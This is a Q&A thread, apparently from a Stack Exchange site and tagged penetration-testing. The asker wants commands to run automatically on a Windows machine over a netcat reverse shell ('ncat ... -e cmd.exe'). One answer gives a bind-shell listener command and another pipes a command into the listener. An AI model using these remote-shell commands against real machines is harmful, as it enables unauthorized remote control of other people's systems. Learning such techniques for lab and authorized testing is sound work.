# Ncat connect and immediately execute command on Windows

Tags: linux, bash, networking, netcat, penetration-testing

I'm trying to figure out a way to open a netcat connection from a listening Linux machine and immediately execute a command on the targeted Windows machine (ex. dir or ipconfig).

Something similar to this:

Linux machine:

```
nc -lvp 4444; dir
```

Windows machine:

```
ncat 192.168.1.25 4444 -e cmd.exe
```

I need to immediately run a command as soon as a connection is made with the Windows machine.

If this can be accomplished with a bash script, that would be great too. I tried scripting it, but it will not register any commands after dropping into the Windows command shell.

Any help or suggestions would be greatly appreciated! Thanks.

Answer (score 2):

https://jkeohan.wordpress.com/2010/04/30/using-netcat-to-spawn-a-remote-shell/

this might be of help.

It should be:

```
##On the server. It opens the 
##listening machine's shell.
ncat -lkv <port number> -c "sh"

##On the client. You type your commands on your terminal
##and the listening machine will be your target.
ncat -v <listening server's IP> <port number>
```

Answer (score 1):

The command should be on `nc`'s standard input, not a local command to run after `nc` finishes.

```
printf "dir\n" | nc -lvp 444
```

See also [Pass commands as input to another command (su, ssh, sh, etc)](https://stackoverflow.com/questions/37586811/pass-commands-as-input-to-another-command-su-ssh-sh-etc)